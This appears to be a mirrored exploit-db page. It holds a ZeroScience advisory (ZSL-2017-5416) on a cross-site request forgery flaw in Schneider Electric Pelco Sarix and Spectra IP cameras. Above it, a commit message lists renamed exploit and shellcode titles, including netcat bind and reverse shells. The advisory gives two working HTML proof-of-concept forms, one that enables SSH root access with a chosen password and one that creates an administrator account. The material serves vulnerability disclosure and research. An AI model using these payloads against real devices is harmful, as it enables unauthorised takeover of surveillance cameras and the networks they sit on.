bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/hardware/webapps/42308.txt
Offensive Security ed107bc711 DB: 2017-07-12 
9 new exploits

Apache 2.0.52 - HTTP GET request Denial of Service
Apache 2.0.52 - GET Request Denial of Service
Microsoft IIS - Malformed HTTP Request Denial of Service (1)
Microsoft IIS - Malformed HTTP Request Denial of Service (2)
Microsoft IIS - HTTP Request Denial of Service (1)
Microsoft IIS - HTTP Request Denial of Service (2)

Microsoft IIS - Malformed HTTP Request Denial of Service
Microsoft IIS - HTTP Request Denial of Service

Adobe Acrobat Reader 8.1.2 - Malformed '.PDF' Remote Denial of Service (PoC)
Adobe Acrobat Reader 8.1.2 - '.PDF' Remote Denial of Service (PoC)

Allegro RomPager 2.10 - Malformed URL Request Denial of Service
Allegro RomPager 2.10 - URL Request Denial of Service

AVM KEN! 1.3.10/1.4.30 - Malformed Request Remote Denial of Service
AVM KEN! 1.3.10/1.4.30 - Remote Denial of Service

Netwin SurgeFTP 1.0b - Malformed Request Denial of Service
Netwin SurgeFTP 1.0b - Denial of Service

iCal 3.7 - Malformed HTTP Request Denial of Service
iCal 3.7 - HTTP Request Denial of Service

3ware Disk Managment 1.10 - Malformed HTTP Request Denial of Service
3ware Disk Managment 1.10 - HTTP Request Denial of Service

Pi3Web 2.0.1 - Malformed GET Request Denial of Service
Pi3Web 2.0.1 - GET Request Denial of Service

Loom Software SurfNow 1.x/2.x - Remote HTTP GET Request Denial of Service
Loom Software SurfNow 1.x/2.x - Remote GET Request Denial of Service

Linksys PSUS4 PrintServer - Malformed HTTP POST Request Denial of Service
Linksys PSUS4 PrintServer - POST Request Denial of Service

Multiple IEA Software Products - HTTP POST Request Denial of Service
Multiple IEA Software Products - POST Request Denial of Service

Linksys WRH54G 1.1.3 Wireless-G Router - Malformed HTTP Request Denial of Service
Linksys WRH54G 1.1.3 Wireless-G Router - HTTP Request Denial of Service

Geo++ GNCASTER 1.4.0.7 - HTTP GET Request Denial of Service
Geo++ GNCASTER 1.4.0.7 - GET Request Denial of Service

D-Link WBR-2310 1.0.4 - HTTP GET Request Remote Buffer Overflow
D-Link WBR-2310 1.0.4 - GET Request Remote Buffer Overflow

Pelco VideoXpert 1.12.105 - Privilege Escalation

Apache Tomcat 3.2.3/3.2.4 - 'Source.jsp' Malformed Request Information Disclosure
Apache Tomcat 3.2.3/3.2.4 - 'Source.jsp' Information Disclosure

Apache Tomcat 3.2.3/3.2.4 - 'RealPath.jsp' Malformed Request Information Disclosure
Apache Tomcat 3.2.3/3.2.4 - 'RealPath.jsp' Information Disclosuree

PlanetDNS PlanetWeb 1.14 - Malformed Request Remote Buffer Overflow
PlanetDNS PlanetWeb 1.14 - Remote Buffer Overflow

AN HTTPD 1.38/1.39/1.40/1.41 - Malformed SOCKS4 Request Buffer Overflow
AN HTTPD 1.38/1.39/1.40/1.41 - SOCKS4 Request Buffer Overflow

Omnicron OmniHTTPd 2.x/3.0 - Get Request Buffer Overflow
Omnicron OmniHTTPd 2.x/3.0 - GET Request Buffer Overflow

JBoss 3.x/4.0.2 - Malformed HTTP Request Remote Information Disclosure
JBoss 3.x/4.0.2 - HTTP Request Remote Information Disclosure
Easy File Sharing Web Server 7.2 - GET HTTP Request Buffer Overflow (SEH)
Easy File Sharing Web Server 7.2 - HEAD HTTP Request Buffer Overflow (SEH)
Easy File Sharing Web Server 7.2 - GET Request Buffer Overflow (SEH)
Easy File Sharing Web Server 7.2 - HEAD Request Buffer Overflow (SEH)

Easy File Sharing Web Server 7.2 - GET HTTP Request 'PassWD' Buffer Overflow (SEH)
Easy File Sharing Web Server 7.2 - GET Request 'PassWD' Buffer Overflow (SEH)

Microsoft Windows Windows 8/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)
Microsoft Windows Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)
Easy File Sharing Web Server 7.2 - GET HTTP Request 'PassWD' Buffer Overflow (DEP Bypass)
NfSen <= 1.3.7 / AlienVault OSSIM 5.3.4 - Command Injection
Easy File Sharing Web Server 7.2 - GET Request 'PassWD' Buffer Overflow (DEP Bypass)
Microsoft Windows Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)

(Generator) - HTTP/1.x requests Shellcode (18+ bytes / 26+ bytes)
(Generator) - HTTP/1.x Requests Shellcode (18+ bytes / 26+ bytes)

Linux/x86-64 - flush iptables rules Shellcode (84 bytes)
Linux/x86-64 - Flush IPTables Rules Shellcode (84 bytes)

Linux/x86 - Self-modifying for IDS evasion Shellcode (64 bytes)
Linux/x86 - Self-Modifying Anti-IDS Shellcode (64 bytes)

Linux/x86 - Bind 8000/TCP + Add User with Root Access Shellcode (225+ bytes)
Linux/x86 - Bind 8000/TCP + Add Root User Shellcode (225+ bytes)
Linux/x86 - File unlinker Shellcode (18+ bytes)
Linux/x86 - Perl script execution Shellcode (99+ bytes)
Linux/x86 - file reader Shellcode (65+ bytes)
Linux/x86 - File Unlinker Shellcode (18+ bytes)
Linux/x86 - Perl Script Execution Shellcode (99+ bytes)
Linux/x86 - File Reader Shellcode (65+ bytes)

Linux/x86 - Add Root User 'r00t' Without Password To /etc/passwd Shellcode (69 bytes)
Linux/x86 - Add Root User (r00t) To /etc/passwd Shellcode (69 bytes)

Linux/x86 - execve /bin/sh anti-ids Shellcode (40 bytes)
Linux/x86 - execve /bin/sh Anti-IDS Shellcode (40 bytes)

Linux/x86 - Add User 'xtz' without Password to /etc/passwd Shellcode (59 bytes)
Linux/x86 - Add User (xtz) To /etc/passwd Shellcode (59 bytes)

Linux/x86 - 24/7 open cd-rom loop (follows /dev/cdrom symlink) Shellcode (39 bytes)
Linux/x86 -  Open CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes)
Linux/x86 - Radically Self Modifying Code Shellcode (70 bytes)
Linux/x86 - Magic Byte Self Modifying Code Shellcode (76 bytes)
Linux/x86 - Radically Self-Modifying Shellcode (70 bytes)
Linux/x86 - Magic Byte Self-Modifying Shellcode (76 bytes)
Linux/x86 - Add User 't00r' encrypt Shellcode (116 bytes)
Linux/x86 - chmod 666 shadow ENCRYPT Shellcode (75 bytes)
Linux/x86 - Add User (t00r) Anti-IDS Shellcode (116 bytes)
Linux/x86 - chmod 666 /etc/shadow Anti-IDS Shellcode (75 bytes)

Linux/x86 - Add User 't00r' Shellcode (82 bytes)
Linux/x86 - Add User (t00r) Shellcode (82 bytes)
Linux/x86 - execve /bin/sh encrypted Shellcode (58 bytes)
Linux/x86 - execve /bin/sh xor encrypted Shellcode (55 bytes)
Linux/x86 - execve /bin/sh Anti-IDS Shellcode (58 bytes)
Linux/x86 - execve /bin/sh (XOR Encoded) Shellcode (55 bytes)

Linux/x86 - Add User 'z' Shellcode (70 bytes)
Linux/x86 - Add User (z) Shellcode (70 bytes)
Linux/x86 - hard / unclean reboot Shellcode (29 bytes)
Linux/x86 - hard / unclean reboot Shellcode (33 bytes)
Linux/x86 - Hard / Unclean Reboot Shellcode (29 bytes)
Linux/x86 - Hard / Unclean Reboot Shellcode (33 bytes)

Linux - Drop suid shell root in /tmp/.hiddenshell Polymorphic Shellcode (161 bytes)
Linux - Drop SUID Root Shell (/tmp/.hiddenshell) Polymorphic Shellcode (161 bytes)

Linux - _nc -lp 31337 -e /bin//sh_ Polymorphic Shellcode (91 bytes)
Linux - Bind Shell (nc -lp 31337 -e /bin//sh) Polymorphic Shellcode (91 bytes)

Linux - Find all writeable folder in filesystem polymorphic Shellcode (91 bytes)
Linux - Find All Writeable Folder In FileSystem Polymorphic Shellcode (91 bytes)
Linux/x86 - setuid(0) + setgid(0) + add user 'iph' Without Password to /etc/passwd Polymorphic Shellcode
Linux/x86 - Search For php/html Writable Files and Add Your Code Shellcode (380+ bytes)
Linux/x86 - setuid(0) + setgid(0) + Add User (iph) To /etc/passwd Polymorphic Shellcode
Linux/x86 - Search For PHP/HTML Writable Files and Add Your Code Shellcode (380+ bytes)

Linux/x86 - Remote Port Forwarding Shellcode (87 bytes)
Linux/x86 - Remote Port Forwarding (ssh -R 9999:localhost:22 192.168.0.226) Shellcode (87 bytes)

Linux/x86 - Reverse TCP Bind 192.168.1.10:31337 Shellcode (92 bytes)
Linux/x86 - Reverse TCP (192.168.1.10:31337) Shellcode (92 bytes)

Linux/x86 - Add map in /etc/hosts file (google.com 127.1.1.1) Shellcode (77 bytes)
Linux/x86 - Add Map (google.com 127.1.1.1) In /etc/hosts Shellcode (77 bytes)

Linux/x86 - Add Map google.com to 127.1.1.1 Obfuscated Shellcode (98 bytes)
Linux/x86 - Add Map (google.com 127.1.1.1) In /etc/hosts Obfuscated Shellcode (98 bytes)

Linux/x86 - /bin/sh ROT7 Encoded Shellcode
Linux/x86 - /bin/sh (ROT7 Encoded) Shellcode

Linux/x86 - /bin/sh ROL/ROR Encoded Shellcode
Linux/x86 - /bin/sh (ROL/ROR Encoded) Shellcode

Linux x86/x86-64 - tcp_bind Port 4444 Shellcode (251 bytes)
Linux x86/x86-64 - Bind 4444/TCP Shellcode (251 bytes)

Linux/x86-64 - Bind NetCat Shellcode (64 bytes)
Linux/x86-64 - Bind Netcat Shellcode (64 bytes)

Linux/x86 - Reverse zsh 9090/TCP Shellcode (80 bytes)
Linux/x86 - Reverse ZSH 127.255.255.254:9090/TCP Shellcode (80 bytes)
Linux - Multi/Dual mode execve(_/bin/sh__ NULL_ 0) Shellcode (37 bytes)
Linux - Multi/Dual mode Reverse Shell Shellcode (129 bytes)
Linux - execve(_/bin/sh__ NULL_ 0) Multi/Dual Mode Shellcode (37 bytes)
Linux - Reverse Shell Multi/Dual Mode Shellcode (Genearator) (129 bytes)

Linux - Dual/Multi mode Bind Shell Shellcode (156 bytes)
Linux - Bind Shell Dual/Multi Mode Shellcode (156 bytes)
Linux/x86-64 - Reverse NetCat Shellcode (72 bytes)
Linux/x86-64 - Reverse NetCat Polymorphic Shellcode (106 bytes)
Linux/x86-64 - Reverse Netcat Shellcode (72 bytes)
Linux/x86-64 - Reverse Netcat Polymorphic Shellcode (106 bytes)

Simple Machines Forum (SMF) 1.1.6 - HTTP POST Request Filter Security Bypass
Simple Machines Forum (SMF) 1.1.6 - POST Request Filter Security Bypass
NfSen < 1.3.7 / AlienVault OSSIM 5.3.4 - Command Injection
Pelco Sarix/Spectra Cameras - Cross-Site Request Forgery / Cross-Site Scripting
Pelco Sarix/Spectra Cameras - Cross-Site Request Forgery (Enable SSH Root Access)
Pelco Sarix/Spectra Cameras - Remote Code Execution
Pelco VideoXpert 1.12.105 - Directory Traversal
Pelco VideoXpert 1.12.105 - Information Disclosure
NfSen < 1.3.7 / AlienVault OSSIM 4.3.1 - 'customfmt' Command Injection
2017-07-12 05:01:24 +00:00

82 lines
3.2 KiB
Text
Executable file
Raw Blame History

Schneider Electric Pelco Sarix/Spectra Cameras CSRF Enable SSH Root Access
Vendor: Schneider Electric SE
Product web page: https://www.pelco.com
Affected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0)
Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0)
Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722)
Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503)
Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0)
Summary: Pelco offers the broadest selection of IP cameras designed
for security surveillance in a wide variety of commercial and industrial
settings. From our industry-leading fixed and high-speed IP cameras to
panoramic, thermal imaging, explosionproof and more, we offer a camera
for any environment, any lighting condition and any application.
When nothing but the best will do. Sarix™ Enhanced Range cameras
provide the most robust feature-set for your mission-critical applications.
With SureVision™ 3.0, Sarix Enhanced delivers the best possible image
in difficult lighting conditions such as a combination of bright areas,
shaded areas, and intense light. Designed with superior reliability,
fault tolerance, and processing speed, these rugged fixed IP cameras
ensure you always get the video that you need.
Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.
Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown
MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)
Lighttpd/1.4.28
PHP/5.3.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5416
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5416.php
07.04.2017
--
CSRF enable ssh root access:
----------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/network/ssh/update" method="POST">
<input type="hidden" name="enabled" value="1" />
<input type="hidden" name="password" value="root123" />
<input type="hidden" name="password&#95;confirmation" value="root123" />
<input type="submit" value="Go root" />
</form>
</body>
</html>
CSRF add admin:
---------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/auth/users/create" method="POST">
<input type="hidden" name="original&#95;username" value="" />
<input type="hidden" name="mode" value="create" />
<input type="hidden" name="group" value="admins" />
<input type="hidden" name="username" value="pelco_admin" />
<input type="hidden" name="password" value="pelco_pass" />
<input type="hidden" name="password&#95;confirmation" value="pelco_pass" />
<input type="submit" value="Add admin" />
</form>
</body>
</html>
Reference in a new issue View git blame Copy permalink